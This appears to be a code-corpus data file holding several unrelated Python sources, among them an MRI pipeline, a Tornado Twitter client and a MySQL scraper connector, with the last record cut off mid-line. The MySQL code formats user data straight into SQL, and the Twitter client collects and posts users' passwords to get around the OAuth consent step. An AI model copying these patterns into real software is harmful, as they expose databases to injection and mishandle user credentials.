pipeline.connect_input('template_to_ute_mat', sute_cont_ute_space,\n 'in_matrix_file')\n pipeline.connect_input('sute_cont_template', sute_cont_ute_space,\n 'in_file')\n sute_cont_ute_space.inputs.apply_xfm = True\n sute_cont_ute_space.inputs.bgvalue = 0\n sute_cont_ute_space.inputs.output_type = 'NIFTI_GZ'\n\n sute_fix_ute_background = pipeline.create_node(\n MultiImageMaths(), name='sute_fix_ute_background',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(\n sute_fix_ute_space,\n 'out_file',\n sute_fix_ute_background,\n 'in_file')\n sute_fix_ute_background.inputs.op_string = \"-add %s \"\n sute_fix_ute_background.inputs.output_type = 'NIFTI_GZ'\n pipeline.connect(\n fill_in_umap,\n 'out_file',\n sute_fix_ute_background,\n 'operand_files')\n\n sute_cont_ute_background = pipeline.create_node(\n MultiImageMaths(), name='sute_cont_ute_background',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(\n sute_cont_ute_space,\n 'out_file',\n sute_cont_ute_background,\n 'in_file')\n sute_cont_ute_background.inputs.op_string = \"-add %s \"\n sute_cont_ute_background.inputs.output_type = 'NIFTI_GZ'\n pipeline.connect(\n fill_in_umap,\n 'out_file',\n sute_cont_ute_background,\n 'operand_files')\n\n smooth_sute_fix = pipeline.create_node(\n Smooth(), name='smooth_sute_fix',\n requirements=[fsl5_req], wall_time=5)\n smooth_sute_fix.inputs.sigma = 2.\n pipeline.connect(\n sute_fix_ute_background,\n 'out_file',\n smooth_sute_fix,\n 'in_file')\n\n smooth_sute_cont = pipeline.create_node(\n Smooth(), name='smooth_sute_cont',\n requirements=[fsl5_req], wall_time=5)\n smooth_sute_cont.inputs.sigma = 2.\n pipeline.connect(\n sute_cont_ute_background,\n 'out_file',\n smooth_sute_cont,\n 'in_file')\n\n pipeline.connect_output('sute_fix_ute', smooth_sute_fix,\n 'smoothed_file')\n pipeline.connect_output('sute_cont_ute', smooth_sute_cont,\n 'smoothed_file')\n pipeline.assert_connected()\n\n return pipeline\n\n# def conversion_to_dicom_pipeline(self, **kwargs):\n#\n# pipeline = self.create_pipeline(\n# name='conversion_to_dicom',\n# inputs=[DatasetSpec('sute_cont_ute', nifti_gz_format),\n# DatasetSpec('sute_fix_ute', nifti_gz_format),\n# DatasetSpec('umap_ute', dicom_format)],\n# outputs=[DatasetSpec('sute_cont_dicoms', dicom_format),\n# DatasetSpec('sute_fix_dicoms', dicom_format)],\n# desc=(\n# \"Conversing resulted two umaps from nifti to dicom format - \"\n# \"parallel implementation\"),\n# version=1,\n# citations=(),\n# parameters=parameters)\n#\n# cont_split = pipeline.create_node(Split(), name='cont_split',\n# requirements=[fsl5_req])\n# cont_split.inputs.dimension = 'z'\n# fix_split = pipeline.create_node(Split(), name='fix_split',\n# requirements=[fsl5_req])\n# fix_split.inputs.dimension = 'z'\n# cont_nii2dicom = pipeline.create_map_node(\n# Nii2Dicom(), name='cont_nii2dicom', iterfield=['in_file',\n# 'reference_dicom'],\n# wall_time=20)\n# fix_nii2dicom = pipeline.create_map_node(\n# Nii2Dicom(), name='fix_nii2dicom', iterfield=['in_file',\n# 'reference_dicom'],\n# wall_time=20)\n# list_dicoms = pipeline.create_node(ListDir(), name='list_dicoms')\n# list_dicoms.inputs.sort_key = dicom_fname_sort_key\n# cont_copy2dir = pipeline.create_node(CopyToDir(),\n# name='cont_copy2dir')\n# cont_copy2dir.inputs.file_ext = '.dcm'\n# fix_copy2dir = pipeline.create_node(CopyToDir(),\n# name='fix_copy2dir')\n# fix_copy2dir.inputs.file_ext = '.dcm'\n# # Connect nodes\n# pipeline.connect(cont_split, 'out_files', cont_nii2dicom, 'in_file')\n# pipeline.connect(fix_split, 'out_files', fix_nii2dicom, 'in_file')\n# pipeline.connect(list_dicoms, 'files', cont_nii2dicom,\n# 'reference_dicom')\n# pipeline.connect(list_dicoms, 'files', fix_nii2dicom,\n# 'reference_dicom')\n# pipeline.connect(cont_nii2dicom, 'out_file', cont_copy2dir,\n# 'in_files')\n# pipeline.connect(fix_nii2dicom, 'out_file', fix_copy2dir, 'in_files')\n# # Connect inputs\n# pipeline.connect_input('sute_cont_ute', cont_split, 'in_file')\n# pipeline.connect_input('sute_fix_ute', fix_split, 'in_file')\n# pipeline.connect_input('umap_ute', list_dicoms, 'directory')\n# # Connect outputs\n# pipeline.connect_output('sute_fix_dicoms', fix_copy2dir, 'out_dir')\n# pipeline.connect_output('sute_cont_dicoms', cont_copy2dir, 'out_dir')\n#\n# pipeline.assert_connected()\n# return pipeline\n # The list of study data_specs that are either primary from the scanner\n # (i.e. without a specified pipeline) or generated by processing pipelines\n# add_data_specs = [\n# DatasetSpec(\n# 'sute_fix_dicoms',\n# dicom_format,\n# conversion_to_dicom_pipeline),\n# DatasetSpec(\n# 'sute_cont_dicoms',\n# dicom_format,\n# conversion_to_dicom_pipeline)]\n","sub_path":"nianalysis/study/mri/structural/ute.py","file_name":"ute.py","file_ext":"py","file_size_in_byte":22124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"18891867","text":"import mysql.connector\nfrom mysql.connector import errorcode\nfrom datetime import datetime\nimport logging\n\nconfig = {'user': 'root', 'password': '', 'host': '127.0.0.1', 'database': 'testdb', 'raise_on_warnings': True}\ncount = 0\n\nlogger = logging.getLogger(\"Humble_Database\")\n\n\nclass StripText:\n def __init__(self, chars=' \\r\\t\\n()£'):\n self.chars = chars\n\n def __call__(self, value): # This makes an instance callable!\n try:\n return value.strip(self.chars)\n except:\n return value\n\n\nclass HumbleDBConnector:\n\n logger.setLevel(logging.INFO)\n # create the logging file handler\n fh = logging.FileHandler(\"../logs/humble_database.log\")\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n # add handler to logger object\n logger.addHandler(fh)\n\n def connect_to_database(self, item):\n try:\n cnx = mysql.connector.connect(**config)\n cursor = cnx.cursor() # item['game_title] instead of item.game_title\n # self.insert_data(self, cursor, cnx, item['game_title'], item['game_price'])\n check_for_duplicates(cursor, cnx, item)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n logger.error(\"Something is wrong with your user name or password\")\n print(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n logger.error(\"Database does not exist\")\n print(\"Database does not exist\")\n else:\n print(err)\n else:\n cnx.close()\n\n\ndef check_for_duplicates(cursor, cnx, item):\n check_duplicates = 'SELECT game_title FROM humble_first_test WHERE game_title = \"%s\"' % item['game_title']\n cursor.execute(check_duplicates)\n result = cursor.fetchone()\n if result:\n #logger.info({\"Duplicate item found: %s\" % result})\n print(\"Duplicate item found: %s\" % result)\n else:\n insert_data(cursor, cnx, item)\n\n\ndef validate(game, date_text):\n try:\n acceptable_date_format = datetime.strptime(date_text, '%d %b, %Y')\n return acceptable_date_format\n except ValueError:\n logger.warning({\"Incorrect data format! Date: \", date_text, \" Game: \", game})\n acceptable_date_format = '1000-01-01'\n return acceptable_date_format\n\n\n# the i=[0] trick is to keep count of how many times the function was called\ndef insert_data(cursor, cnx, item, i=[0]):\n\n add_row = \"INSERT INTO humble_first_test\" \"(a_i, game_title, game_platform, game_operating_system,\" \\\n \" discount_percentage, current_price, full_link, date_scrapped)\" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\n\n a_i = cursor.lastrowid\n # sql = \"\"\"INSERT INTO test_table(A_I, Title, Price) VALUES(%s, %s, %s)\"\"\" % (A_I, 'Title', \"Price\")\n\n game_details = (a_i, item['game_title'], item['game_platform'], item['game_operating_system'],\n item['game_discount_percentage'], item['game_current_price'], item['game_full_link'],\n datetime.now())\n\n cursor.execute(add_row, game_details)\n #logger.info(\"Database update\")\n\n cnx.commit()\n cursor.close()\n i[0] += 1\n logger.info({\"Games added:\", i[0]})\n print(\"Games added:\", i[0])\n\n\nif __name__ == '__main__':\n print(\"This only executes when %s is executed rather than imported\" % __file__)\n\n","sub_path":"web_crawler/database_connector/humble_db_connector.py","file_name":"humble_db_connector.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"340217334","text":"\n\"\"\"\nrental property calculations\n\"\"\"\n\n\nimport numpy as np\nfrom utils import get_monthly_mortgage_payment, get_mortgage_balance\n\n# initial transaction\npurchase_price = 435e3\npurchase_closing_costs = 3000 + (0.00 * purchase_price)\ninitial_repairs = 12000\npre_rent_holding_days = 30\n\n# mortgage and taxes\ndown_payment_percentage = 25\nloan_interest_rate = 3.875\nloan_term_years = 30\nannual_taxes_percentage = 1.25\n\n# monthly rent and expenses\nmonthly_rent = 2200\nvacancy_days_per_year = 0\nmonthly_insurance = 125\nmonthly_repairs = 0\nmonthly_capex = 0\nmonthly_prop_mgmt_percentage = 0\n\n# appreciation and sale\nholding_years = 5\nappreciation_annual_percentage = 5\nagent_sale_percentage = 6\nsale_closing_costs = 5000\ncleanup_costs = 3000\n\nprint('\\nPurchase Price: ${:.0f}\\n'.format(purchase_price))\n\ndown_payment = (down_payment_percentage / 100) * purchase_price\nloan_amount = (1 - (down_payment_percentage / 100)) * purchase_price\n\nmonthly_mortgage_payment = get_monthly_mortgage_payment(loan_amount, loan_interest_rate, loan_term_years)\nmonthly_taxes = (annual_taxes_percentage / 100) * purchase_price / 12\npre_rent_holding_cost = (monthly_mortgage_payment + monthly_taxes + monthly_insurance + monthly_capex) * (pre_rent_holding_days / 30)\ntotal_invested_capital = down_payment + purchase_closing_costs + pre_rent_holding_cost + initial_repairs\n\nprint('Total Invested Capital: ${:.0f}'.format(total_invested_capital))\nprint(' {:.0f}% down payment: ${:.0f}'.format(down_payment_percentage, purchase_price - loan_amount))\nprint(' purchase closing costs: ${:.0f}'.format(purchase_closing_costs))\nprint(' pre-rent holding costs: ${:.0f}'.format(pre_rent_holding_cost))\nprint(' initial repairs: ${:.0f}\\n'.format(initial_repairs))\n\nprint('Monthly Income (rent): ${:.0f}\\n'.format(monthly_rent))\n\ndaily_rent = monthly_rent / 30\nmonthly_vacancy = daily_rent * vacancy_days_per_year / 12\nmonthly_prop_mgmt = (monthly_prop_mgmt_percentage / 100) * monthly_rent\nmonthly_expenses = \\\n monthly_mortgage_payment + \\\n monthly_taxes + \\\n monthly_insurance + \\\n monthly_vacancy + \\\n monthly_repairs + \\\n monthly_capex + \\\n monthly_prop_mgmt\n\nprint('Monthly Expenses: ${:.0f}'.format(monthly_expenses))\nprint(' mortgage payment: ${:.0f}'.format(monthly_mortgage_payment))\nprint(' taxes: ${:.0f}'.format(monthly_taxes))\nprint(' insurance: ${:.0f}'.format(monthly_insurance))\nprint(' vacancy: ${:.0f}'.format(monthly_vacancy))\nprint(' repairs: ${:.0f}'.format(monthly_repairs))\nprint(' capex: ${:.0f}'.format(monthly_capex))\nprint(' property management: ${:.0f}\\n'.format(monthly_prop_mgmt))\n\nmonthly_cash_flow = monthly_rent - monthly_expenses\nannual_cash_flow_percentage = 100 * 12 * monthly_cash_flow / total_invested_capital\n\nprint('Monthly Cash Flow (Income - Expenses): ${:.0f}\\n'.format(monthly_cash_flow))\nprint('--- Annual Cash Flow Percentage: {:.1f}% ---\\n'.format(annual_cash_flow_percentage))\n\nsale_price = purchase_price * (1 + (appreciation_annual_percentage / 100)) ** holding_years\nagent_sale_fee = (agent_sale_percentage / 100) * sale_price\nmortgage_balance = get_mortgage_balance(loan_amount, loan_interest_rate, loan_term_years, holding_years)\nsale_profit = sale_price - (mortgage_balance + agent_sale_fee + sale_closing_costs + cleanup_costs)\n\nprint('Sale Profit: ${:.0f}'.format(sale_profit))\nprint(' sale price at {:.0f}% annual appreciation for {:.0f} years: ${:.0f}'.format(appreciation_annual_percentage, holding_years, sale_price))\nprint(' mortgage balance (from initial ${:.0f} balance): ${:.0f}'.format(loan_amount, mortgage_balance))\nprint(' agent fees at {:.0f}% commision: ${:.0f}'.format(agent_sale_percentage, agent_sale_fee))\nprint(' sale closing costs: ${:.0f}'.format(sale_closing_costs))\nprint(' cleanup costs: ${:.0f}\\n'.format(cleanup_costs))\n\nmonthly_cash_flow_profit = 12 * monthly_cash_flow * holding_years\ntotal_profit = monthly_cash_flow_profit + sale_profit\ntotal_annual_return = 100 * (((total_profit / total_invested_capital) ** (1 / holding_years)) - 1)\n\nprint('Total Profit: ${:.0f}'.format(total_profit))\nprint('(sale profit + ${:.0f} from monthly cash flow counted {} times\\n'.format(\n monthly_cash_flow_profit, holding_years * 12))\nprint('--- Annualized Total Return: {:.1f}% ---\\n'.format(total_annual_return))\n","sub_path":"bokeh/real estate/_old/v1/rental.py","file_name":"rental.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381822534","text":"\"\"\"Base class for chaining DBs\"\"\"\n\nimport itertools\n\nfrom collections import ChainMap\nfrom collections.abc import MutableMapping\n\n\nclass ChainDB(ChainMap):\n \"\"\" A ChainMap who's ``_getitem__`` returns either a ChainDB or\n the result\"\"\"\n\n def __getitem__(self, key):\n res = None\n results = []\n # Try to get all the data from all the mappings\n for mapping in self.maps:\n results.append(mapping.get(key, None))\n # if all the results are mapping create a ChainDB\n if all([isinstance(result, MutableMapping) for result in results]):\n for result in results:\n if res is None:\n res = ChainDB(result)\n else:\n res.maps.append(result)\n elif all([isinstance(result, list) for result in results]):\n return list(itertools.chain(*results))\n else:\n for result in reversed(results):\n if result is not None:\n return result\n return res\n\n def __setitem__(self, key, value):\n if key not in self:\n super().__setitem__(key, value)\n else:\n res = None\n results = []\n # Try to get all the data from all the mappings\n for mapping in reversed(self.maps):\n if key in mapping:\n mapping[key] = value\n","sub_path":"regolith/chained_db.py","file_name":"chained_db.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"583121999","text":"class Solution:\n def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool:\n \n def check_diagonal_validity(arr, row, col):\n\n while row', response.body)[0]\r\n oauth_token = re.findall('', response.body)[0]\r\n \r\n # 将得到的用户名和密码POST到Twitter登陆界面\r\n \r\n args = {\r\n 'authenticity_token': authenticity_token,\r\n 'oauth_token': oauth_token,\r\n 'session[username_or_email]': self.get_argument('user'),\r\n 'session[password]': self.get_argument('passwd'),\r\n }\r\n http = tornado.httpclient.AsyncHTTPClient()\r\n http.fetch('https://api.twitter.com/oauth/authorize', \r\n method = 'POST',\r\n body = urllib.urlencode(args),\r\n callback = self._on_authorize_page)\r\n \r\n def _on_request_token(self, authorize_url, callback_uri, response):\r\n '''\r\n STEP2:\r\n 用得到的oauth_token去抓取Twitter的登陆界面\r\n '''\r\n\r\n if response.error:\r\n raise tornado.web.HTTPError(403, \"Could not get request token ~\")\r\n self._request_token = tornado.auth._oauth_parse_response(response.body)\r\n \r\n args = dict(oauth_token = self._request_token[\"key\"])\r\n auth_url = authorize_url + \"?\" + urllib.urlencode(args)\r\n http = tornado.httpclient.AsyncHTTPClient()\r\n http.fetch(auth_url, self._on_authenticate_page)\r\n \r\n def _on_authorize_page(self, response):\r\n ''' \r\n STEP4: \r\n 如果登陆成功则取得oauth_token和oauth_verifier然后利用auth模块得到access_token\r\n '''\r\n \r\n if response.error:\r\n raise tornado.web.HTTPError(404, \"Authorize Failed ~\")\r\n \r\n # 如果成功,可以在返回的页面里面扣到oauth_token和oauth_verifier\r\n \r\n try:\r\n token = re.findall('', response.body)\r\n request_key = token[0][0]\r\n oauth_verifier = token[0][1]\r\n except:\r\n raise tornado.web.HTTPError(401, \"Get Authorize Message Failed ~\")\r\n \r\n if self._request_token['key'] != request_key:\r\n raise tornado.web.HTTPError(403, \"Get Access Token Failed ~\")\r\n return\r\n \r\n token = dict(\r\n key = self._request_token['key'], \r\n secret = self._request_token['secret'],\r\n verifier = oauth_verifier\r\n )\r\n \r\n http = tornado.httpclient.AsyncHTTPClient()\r\n http.fetch(self._oauth_access_token_url(token), self._on_access_token)\r\n \r\n @tornado.web.asynchronous \r\n def post(self):\r\n ''' \r\n STEP1: \r\n 过程的入口,由tornado的auth模块帮我们得到oauth_token\r\n '''\r\n self.authenticate_redirect()\r\n\r\n @tornado.web.asynchronous \r\n def get(self):\r\n ''' \r\n STEP1: \r\n 过程的入口,由tornado的auth模块帮我们得到oauth_token\r\n '''\r\n self.authenticate_redirect()\r\n \r\nclass TwitterClient(tornado.auth.TwitterMixin, tornado.web.RequestHandler):\r\n '''\r\n A Twitter Client for Madoka frontend\r\n supported request:\r\n POST\r\n update\r\n GET\r\n tl\r\n mention\r\n show (得到某个特定id的Tweet\r\n usertl (User Timeline\r\n remove\r\n '''\r\n \r\n def _on_twitter_request(self, callback, response):\r\n \r\n # 这个也是TwitterMixin里面的东西,重写方法来拦截错误\r\n if response.error:\r\n raise tornado.web.HTTPError(403)\r\n return\r\n \r\n # 如果callback为None表示不需要回调函数,就直接调用self.finish就可以了ww\r\n if callback != None:\r\n callback(tornado.escape.json_decode(response.body))\r\n else:\r\n self.finish()\r\n \r\n\r\n def _dumpTweet(self, tweet):\r\n ''' 整理Tweet的内容将Twitter API返回的Tweet的格式转换成本地使用的格式 '''\r\n \r\n t = {}\r\n t['text'] = tweet['text']\r\n #\r\n # solve t.co problems -> replace t.co links with the original links\r\n #\r\n \r\n if 'entities' in tweet:\r\n t['urls'] = tweet['entities']['urls']\r\n else:\r\n t['urls'] = []\r\n \r\n t['name'] = tweet['user']['name']\r\n t['screen_name'] = tweet['user']['screen_name']\r\n t['created_at'] = tweet['created_at'].replace('+0000', 'UTC')\r\n t['id'] = tweet['id']\r\n t['in_reply_to_status_id'] = tweet['in_reply_to_status_id']\r\n t['profile_image_url'] = tweet['user']['profile_image_url']\r\n return t\r\n \r\n \r\n def _on_fetch(self, tweets, single_tweet = False):\r\n \r\n # 重载_on_twitter_request方法以后错误被拦截了,以下代码就不需要了\r\n # if tweets == None:\r\n # raise tornado.httpclient.HTTPError(403)\r\n \r\n if single_tweet == False:\r\n dump = [self._dumpTweet(tweet) for tweet in tweets]\r\n else:\r\n dump = self._dumpTweet(tweets)\r\n self.write(tornado.escape.json_encode(dump))\r\n self.finish()\r\n \r\n def _on_related_results(self, res):\r\n \r\n # 处理/related_results/show/:id.json API返回结果\r\n # 如果有相关结果list就有1个元素 反之则没有\r\n \r\n in_reply_to = []\r\n replies = []\r\n \r\n if len(res) > 0:\r\n results = res[0]['results']\r\n for item in results:\r\n if item['annotations']['ConversationRole'] == 'Ancestor':\r\n in_reply_to.append(self._dumpTweet(item['value']))\r\n else:\r\n replies.append(self._dumpTweet(item['value']))\r\n \r\n dump = dict(\r\n in_reply_to = in_reply_to,\r\n replies = replies,\r\n )\r\n \r\n self.write(tornado.escape.json_encode(dump))\r\n self.finish()\r\n \r\n def _dump_user_info(self, user_info):\r\n ui = {}\r\n ui['id'] = user_info['id']\r\n ui['name'] = user_info['name']\r\n ui['screen_name'] = user_info['screen_name']\r\n ui['location'] = user_info['location']\r\n ui['description'] = user_info['description']\r\n ui['profile_image_url'] = user_info['profile_image_url']\r\n ui['followers_count'] = user_info['followers_count']\r\n ui['friends_count'] = user_info['friends_count']\r\n ui['created_at'] = user_info['created_at'].replace('+0000', 'UTC')\r\n ui['favourites_count'] = user_info['favourites_count']\r\n ui['following'] = user_info['following']\r\n ui['statuses_count'] = user_info['statuses_count']\r\n return ui\r\n \r\n def _on_user_info(self, user_info):\r\n self.write(tornado.escape.json_encode(self._dump_user_info(user_info)))\r\n self.finish()\r\n \r\n @tornado.web.asynchronous\r\n def get(self, request):\r\n access_token = tornado.escape.json_decode(self.get_argument('access_token'))\r\n secret = access_token['secret']\r\n key = access_token['key']\r\n \r\n if request == 'home_timeline':\r\n # get home timeline\r\n \r\n self.twitter_request(\r\n path = \"/statuses/home_timeline\",\r\n access_token = {u'secret': secret, u'key': key},\r\n callback = self._on_fetch,\r\n page = self.get_argument('page', 1),\r\n include_entities = 'true'\r\n ) \r\n elif request == 'mentions':\r\n # 得到mention一个用户的Tweet\r\n\r\n self.twitter_request(\r\n path = \"/statuses/mentions\",\r\n page = self.get_argument('page', 1),\r\n access_token = {u'secret': secret, u'key': key},\r\n callback = self._on_fetch,\r\n include_entities = 'true'\r\n ) \r\n elif request == 'show':\r\n #得到某个特定id的Tweet\r\n\r\n self.twitter_request(\r\n path = \"/statuses/show/\" + str(self.get_argument('id')),\r\n access_token = {u'secret': secret, u'key': key},\r\n callback = self.async_callback(self._on_fetch, single_tweet = True),\r\n include_entities = False\r\n ) \r\n elif request == 'details':\r\n \r\n #得到某个特定id的Tweet相关的结果\r\n\r\n self.twitter_request(\r\n path = \"/related_results/show/\" + str(self.get_argument('id')),\r\n access_token = {u'secret': secret, u'key': key},\r\n callback = self._on_related_results,\r\n include_entities = True\r\n ) \r\n \r\n elif request == 'user_info':\r\n \r\n # 得到某个用户的信息\r\n \r\n self.twitter_request(\r\n path = \"/users/show\",\r\n access_token = {u'secret': secret, u'key': key},\r\n callback = self._on_user_info,\r\n screen_name = self.get_argument('screen_name')\r\n ) \r\n \r\n elif request == 'remove':\r\n # 删除某个Tweet\r\n def on_fetch(tweet):\r\n pass\r\n \r\n self.twitter_request(\r\n path = \"/statuses/destroy/\" + str(self.get_argument('id')),\r\n access_token = {u'secret': secret, u'key': key},\r\n post_args = {},\r\n callback = None,\r\n ) \r\n elif request == 'user_timeline':\r\n # 得到某用户的Timeline\r\n \r\n self.twitter_request(\r\n path = \"/statuses/user_timeline\",\r\n access_token = {u'secret': secret, u'key': key},\r\n page = self.get_argument('page', 1),\r\n screen_name = self.get_argument('screen_name'),\r\n callback = self._on_fetch,\r\n include_entities = 'true'\r\n ) \r\n elif request == 'follow':\r\n #\r\n # follow someone \r\n # argument screen_name: screen name of the one you want to follow\r\n #\r\n self.twitter_request(\r\n path = \"/friendships/create\",\r\n access_token = {u'secret': secret, u'key': key},\r\n post_args={'screen_name': self.get_argument('screen_name')},\r\n callback = None,\r\n ) \r\n elif request == 'unfollow':\r\n #\r\n # follow someone \r\n # argument screen_name: screen name of the one you want to follow\r\n #\r\n self.twitter_request(\r\n path = \"/friendships/destroy\",\r\n access_token = {u'secret': secret, u'key': key},\r\n post_args={'screen_name': self.get_argument('screen_name')},\r\n callback = None,\r\n ) \r\n else:\r\n raise tornado.httpclient.HTTPError(403, 'Invaild Request Path ~') \r\n \r\n @tornado.web.asynchronous\r\n def post(self, request):\r\n access_token = tornado.escape.json_decode(self.get_argument('access_token'))\r\n secret = access_token['secret']\r\n key = access_token['key']\r\n if request == 'update':\r\n # tweet\r\n \r\n status = tornado.escape.url_unescape(self.get_argument('status').encode('utf-8'))\r\n def on_fetch(tweets):\r\n if tweets == None:\r\n raise tornado.httpclient.HTTPError(403)\r\n self.write('Done ~')\r\n self.finish()\r\n \r\n # 将多于140个字符的部分截去\r\n \r\n if len(status) > 140:\r\n text = status[:136] + '...'\r\n else:\r\n text = status\r\n\r\n # 如果有in_reply_to参数则带上这个参数ww\r\n \r\n in_reply_to_param = {}\r\n if self.get_argument('in_reply_to', None):\r\n in_reply_to_param['in_reply_to_status_id'] = self.get_argument('in_reply_to', None)\r\n \r\n self.twitter_request(\r\n path = \"/statuses/update\",\r\n post_args={\"status\": text},\r\n access_token = {u'secret': secret, u'key': key},\r\n callback = on_fetch,\r\n **in_reply_to_param\r\n ) \r\n \r\n \r\n","sub_path":"TwitterClient.py","file_name":"TwitterClient.py","file_ext":"py","file_size_in_byte":13662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"323466883","text":"from datetime import datetime\nfrom django.conf import settings\nfrom django.template import TemplateSyntaxError\nfrom django.test import TestCase\nfrom django.test.utils import override_settings\nfrom pinpayments.templatetags.pin_payment_tags import pin_form, pin_header\n\nENV_OK = {\n 'staging': {\n 'key': 'key1',\n 'secret': 'secret1',\n 'host': 'test-api.pin.net.au',\n },\n}\n\nENV_MISSING_KEY = {\n 'test': {\n 'secret': 'secret1',\n 'host': 'test-api.pin.net.au',\n },\n}\n\nENV_MISSING_HOST = {\n 'test': {\n 'key': 'key1',\n 'secret': 'secret1',\n },\n}\n\nclass TemplateTagsTests(TestCase):\n def test_pin_form(self):\n form = pin_form()\n current_year = datetime.now().year\n self.assertEqual(form['pin_cc_years'],\n range(current_year, current_year + 15))\n\n def test_pin_header_default_environment(self):\n header = pin_header()\n self.assertEqual(header['pin_environment'], 'test')\n\n @override_settings(PIN_ENVIRONMENTS={})\n def test_pin_header_no_environments(self):\n self.assertRaises(TemplateSyntaxError, pin_header)\n\n def test_pin_header_default_environment(self):\n with self.assertRaises(TemplateSyntaxError):\n pin_header(environment='should not exist')\n\n @override_settings(PIN_ENVIRONMENTS=ENV_MISSING_KEY)\n def test_pin_header_no_key(self):\n self.assertRaises(TemplateSyntaxError, pin_header)\n\n @override_settings(PIN_ENVIRONMENTS=ENV_MISSING_HOST)\n def test_pin_header_no_host(self):\n self.assertRaises(TemplateSyntaxError, pin_header)\n\n @override_settings(PIN_ENVIRONMENTS=ENV_OK)\n def test_pin_header_success(self):\n header = pin_header(environment='staging')\n self.assertEqual(header['pin_environment'], 'staging')\n self.assertEqual(header['pin_public_key'], 'key1')\n self.assertEqual(header['pin_host'], 'test-api.pin.net.au')\n","sub_path":"pinpayments/tests/templatetags.py","file_name":"templatetags.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"59688360","text":"\"\"\"\nTime O(M+N)\nSpace O(1)\n\"\"\"\n\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n if headA == None or headB == None:\n return None\n\n #assign two pointers\n curA = headA \n curB = headB\n\n #change curA to headB when it reaches the end of the list A, same for curB\n #they either meet or both be None\n while curA != curB:\n if curA == None:\n curA = headB\n else:\n curA = curA.next\n \n if curB == None:\n curB = headA\n else:\n curB = curB.next\n\n return curA \n\n\n\"\"\"\nHash table solution \nTime O(n)\nSpace O(n)\n\"\"\"\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n if headA == None or headB == None:\n return None\n\n dic = {}\n \n while headA != None:\n dic[headA] = headA\n headA = headA.next\n \n while headB != None:\n if headB in dic:\n return headB\n else:\n headB = headB.next\n \n return headB","sub_path":"160.Intersecion_of_two_linkedlists.py","file_name":"160.Intersecion_of_two_linkedlists.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"216912958","text":"import os\nimport numpy as np\nimport pytest\nfrom jina.executors.metas import get_default_metas\nfrom jina.executors import BaseExecutor\nfrom .. import ImagePaddlehubEncoder\n\ninput_dim = 224\ntarget_output_dim = 2048\nnum_doc = 2\ntest_data = np.random.rand(num_doc, 3, input_dim, input_dim)\ntmp_files = []\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef metas(tmpdir):\n metas = get_default_metas()\n if 'JINA_TEST_GPU' in os.environ:\n metas['on_gpu'] = True\n metas['workspace'] = str(tmpdir)\n yield metas\n\n\ndef test_imagepaddlehubencoder_encode(metas):\n encoder = ImagePaddlehubEncoder(metas=metas)\n encoded_data = encoder.encode(test_data)\n assert encoded_data.shape == (num_doc, target_output_dim)\n\n\ndef test_imagepaddlehubencoder_save_and_load(metas):\n encoder = ImagePaddlehubEncoder(metas=metas)\n encoder.touch()\n encoder.save()\n assert os.path.exists(encoder.save_abspath)\n encoder_loaded = BaseExecutor.load(encoder.save_abspath)\n assert encoder_loaded.model_name == encoder.model_name\n\n\ndef test_imagepaddlehubencoder_save_and_load_config(metas):\n encoder = ImagePaddlehubEncoder(metas=metas)\n encoder.save_config()\n assert os.path.exists(encoder.config_abspath)\n encoder_loaded = BaseExecutor.load_config(encoder.config_abspath)\n assert encoder_loaded.model_name == encoder.model_name\n","sub_path":"encoders/image/ImagePaddlehubEncoder/tests/test_paddlehub.py","file_name":"test_paddlehub.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"301262389","text":"\"\"\"\n\nAlgorithm:\n\n1. Map each character in str1 to what it needs to be in str2.\n2. If any of these mappings collide then return False since the transformation\n is impossible..\n (e.g. str1 = \"aa\", str2 = \"bc\", \"a\" needs to become both \"b\" and \"c\")\n3. Next, we check the number of unique characters in str2.\n If all 26 characters are represented, there are no characters available\n to use for temporary conversions, and the transformation is impossible.\n The only exception to this is if str1 is equal to str2 and we handle this\n case at the start of the function.\n\n\nTime Complexity: O(n)\nSpace Complexity: O(1)\n\n\"\"\"\n\n\nclass Solution:\n def canConvert(self, str1: str, str2: str) -> bool:\n # base case\n if str1 == str2:\n return True\n m = {}\n for i in range(len(str1)):\n # udpate mapping\n if str1[i] not in m:\n m[str1[i]] = str2[i]\n # collision detected, return False\n elif m[str1[i]] != str2[i]:\n return False\n return len(set(str2)) < 26\n","sub_path":"stringTransformsIntoAnotherString.py","file_name":"stringTransformsIntoAnotherString.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"96029020","text":"\nclass Details:\n width 